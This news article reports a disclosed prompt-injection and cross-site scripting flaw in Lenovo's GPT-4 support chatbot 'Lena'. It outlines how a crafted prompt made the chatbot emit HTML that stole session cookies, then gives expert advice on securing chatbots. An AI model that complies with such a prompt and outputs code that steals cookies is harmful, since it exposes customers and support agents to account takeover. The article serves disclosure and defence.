Critical vulnerabilities have been found in Lenovo’s AI-powered customer support chatbot that allowed attackers to steal session cookies and potentially gain unauthorized access to the company’s customer support systems using a single malicious prompt.
Lenovo’s chatbot “Lena,” which is powered by OpenAI’s GPT-4, was vulnerable to cross-site scripting (XSS) attacks due to improper input and output sanitization, according to security researchers at Cybernews who discovered the flaws. The vulnerability enabled attackers to inject malicious code through a carefully crafted 400-character prompt that tricked the AI system into generating harmful HTML content.
Cybernews researchers said the vulnerability served as a stark warning about the security risks inherent in poorly implemented AI chatbots, particularly as organizations rapidly adopt AI across enterprise environments.
“Everyone knows chatbots hallucinate and can be tricked by prompt injections. This isn’t new,” the Cybernews Research team said in a report. “What’s truly surprising is that Lenovo, despite being aware of these flaws, did not protect itself from potentially malicious user manipulations and chatbot outputs.”
How the attack worked
The vulnerability demonstrated the cascade of security failures that can occur when AI systems lack proper input and output sanitization. The researchers’ attack involved tricking the chatbot into generating malicious HTML code through a prompt that began with a legitimate product inquiry, included instructions to convert responses into HTML format, and embedded code designed to steal session cookies when images failed to load.
When Lenovo’s Lena received the malicious prompt, the researchers noted that “people-pleasing is still the issue that haunts large language models, to the extent that, in this case, Lena accepted our malicious payload, which produced the XSS vulnerability and allowed the capture of session cookies.”
Melissa Ruzzi, director of AI at security company AppOmni, said the incident highlighted “the well-known issue of prompt injection on Generative AI.” She warned that “it’s crucial to oversee all the data access the AI has, which most of the time includes not only read permissions, but also the ability to edit. That could make this type of attack even more devastating.”
Enterprise-wide implications
While the immediate impact involved session cookie theft, the vulnerability’s implications extended far beyond data exfiltration.
The researchers warned that the same vulnerability could enable attackers to alter support interfaces, deploy keyloggers, launch phishing attacks, and execute system commands that could install backdoors and enable lateral movement across network infrastructure.
“Using the stolen support agent’s session cookie, it is possible to log into the customer support system with the support agent’s account,” the researchers explained. The researchers noted that “this is not limited to stealing cookies. It may also be possible to execute some system commands, which could allow for the installation of backdoors and lateral movement to other servers and computers on the network.”
Security imperatives for CISOs
For security leaders, the incident underscored the need for fundamental changes in AI deployment approaches.
Arjun Chauhan, practice director at Everest Group, said the vulnerability is “highly representative of where most enterprises are today, deploying AI chatbots rapidly for customer experience gains without applying the same rigor they would to other customer-facing applications.”
The fundamental issue is that companies treat AI systems as experimental side projects rather than mission-critical applications that need robust security controls.
“Many organizations still treat LLMs as ‘black boxes’ and don’t integrate them into their established app security pipelines,” Chauhan explained. “CISOs should treat AI chatbots as full-fledged applications, not just AI pilots.” ‘
This means applying the same security rigor used for web applications, ensuring AI responses cannot directly execute code, and running specific tests against prompt injection attacks.
Ruzzi recommended that companies “stay up to date on best practices in prompt engineering” and “implement additional checks to limit how the AI interprets prompt content, and monitor and control data access of the AI.”
The researchers urged companies to adopt a “never trust, always verify” approach for all data flowing through AI chatbot systems.
Balancing innovation with risk
The Lenovo vulnerability exemplified the security challenges that arise when organizations rapidly deploy AI technologies without adequate security frameworks. Chauhan warned that “the risk profile is fundamentally different” with AI systems because “models behave unpredictably under adversarial inputs.”
Recent industry data showed that automated bot traffic surpassed human-generated traffic for the first time, constituting 51% of all web traffic in 2024. The vulnerability categories align with broader AI security concerns documented in OWASP’s top ten list of LLM vulnerabilities, where prompt injections ranked first.
Ruzzi noted that “AI chatbots can be seen as another SaaS app, where data access misconfigurations can easily turn into data breaches.” She emphasized that “more than ever, security should be an intrinsic part of all AI implementation. Although there is pressure to release AI features as fast as possible, this must not compromise proper data security.”
“The Lenovo case reinforces that prompt injection and XSS aren’t theoretical; they’re active attack vectors,” Chauhan said. “Enterprises must weigh AI’s speed-to-value against the reputational and regulatory fallout of a breach, and the only sustainable path is security-by-design for AI.”
Lenovo spokesman Stuart Gill told CSO, “Lenovo takes the security of our products and the protection of our customers very seriously. We were recently made aware of a chatbot cross-site scripting (XSS) vulnerability by a third-party security researcher. Upon becoming aware of the issue, we promptly assessed the risk and implemented corrective actions to mitigate potential impact and address the issue. We want to thank the researchers for their responsible disclosure, which allowed us to deploy a solution without putting our customers at risk.”
No Responses